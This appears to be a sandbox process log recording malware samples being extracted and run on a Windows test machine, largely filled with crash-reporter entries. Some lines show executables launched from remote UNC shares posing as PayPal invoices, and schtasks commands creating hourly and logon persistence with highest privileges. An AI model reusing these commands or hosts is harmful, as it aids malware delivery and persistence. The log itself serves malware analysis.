C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1292

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=352BDEAAF6E4DE23B0F5C92E323F7FD0 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A5778EA36F452CE5B227CA786B21E96F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A5778EA36F452CE5B227CA786B21E96F --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8283D8FE007B405FF19D6E66F315358D --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 10120 -ip 10120

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3892288F60D5FEED774B777113302FEA --mojo-platform-channel-handle=1804 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\aa641dbc9ba61f0b29a8bbb5deda6e48d53a9af403f6fcff3d65ddc3b8d84156\" -spe -an -ai#7zMap7453:218:7zEvent28125

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1292

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\917602de9f090920833163da75a8c9f6caa9b0fd7a2715bf95eb8c5a7067d114\" -spe -an -ai#7zMap16741:218:7zEvent24048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1224

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-23-11\79e0fcb3dba988510f42059372ddd0cc77723aba3ed40d7220ca44467e790b6e\" -spe -an -ai#7zMap27302:218:7zEvent17547

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532

C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe

"C:\Users\Admin\Downloads\2023-11-23-11\3c47f28be9b0985a64ec458337ff217346a69d670cdc582f6813f32e8d75ed52.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 10120 -ip 10120

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

\??\UNC\62.173.141.116\scarica\paypal_inv.exe

"\\62.173.141.116\scarica\paypal_inv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6992 -ip 6992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6992 -s 516

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1552

\??\UNC\62.173.141.114\scarica\InvoicePayPal.exe

"\\62.173.141.114\scarica\InvoicePayPal.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 11132 -ip 11132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11132 -s 572

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1264

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1084

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1312

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1364

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1328

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2208,16931134321098190933,16403902932469870216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5276 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1460

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-11-22-05\" -spe -an -ai#7zMap1680:88:7zEvent19774

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1132

C:\Users\Admin\Downloads\2023-11-22-05\6b0516642e5baf8ceaea3fabe4456f60f643531befc1185102215fcf28e4017b.exe

"C:\Users\Admin\Downloads\2023-11-22-05\6b0516642e5baf8ceaea3fabe4456f60f643531befc1185102215fcf28e4017b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1588

C:\Users\Admin\Downloads\2023-11-22-05\bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b.exe

"C:\Users\Admin\Downloads\2023-11-22-05\bca02faf8b705cffad72deb87ef895ce6626636d498e05b274b079c9ace3dc5b.exe"

C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"

C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe

"C:\Users\Admin\AppData\Local\Temp\ppxsvdjxm.exe"

C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe

"C:\Users\Admin\Downloads\2023-11-22-05\135cdbfa671ffafa1c728ec8f270ca055d20e1669cd809d72273da202028a64f.exe"

C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe

"C:\Users\Admin\Downloads\2023-11-22-05\8195afbce4ef411cd0b1ac7cc27e3d66b575df16a5433b60aa0e7a3529f465ef.exe"

C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe

"C:\Users\Admin\Downloads\2023-11-22-05\595586e83cde2e83072b025e5199b451eed4a290b3cd7640c7e6df90ba364aa3.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304

C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe

"C:\Users\Admin\Downloads\2023-11-22-05\e340efd16c8fc3ed295ec674e97bed2ec4bc1e2a14a8089537b03da23f0f47ff.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\Downloads\2023-11-22-05\6f735da34e90dce7418f49a7d25fa183650fd9fe681804a9ab5f80d3005b1c5d.exe

"C:\Users\Admin\Downloads\2023-11-22-05\6f735da34e90dce7418f49a7d25fa183650fd9fe681804a9ab5f80d3005b1c5d.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 11268 -ip 11268

C:\Users\Admin\Downloads\2023-11-22-05\08cc8cfcabf0fe26de3d9bdfd6e705eb1e70f1b3e9f880f8a50cb1aee051cee0.exe

"C:\Users\Admin\Downloads\2023-11-22-05\08cc8cfcabf0fe26de3d9bdfd6e705eb1e70f1b3e9f880f8a50cb1aee051cee0.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11268 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 11412 -ip 11412

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11412 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1560

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\b64c58644b\Utsysc.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\ProgramData\pinterests\XRJNZC.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1304

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 10120 -ip 10120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 10120 -s 1544

C:\Windows\SysWOW64\WerFault.exe

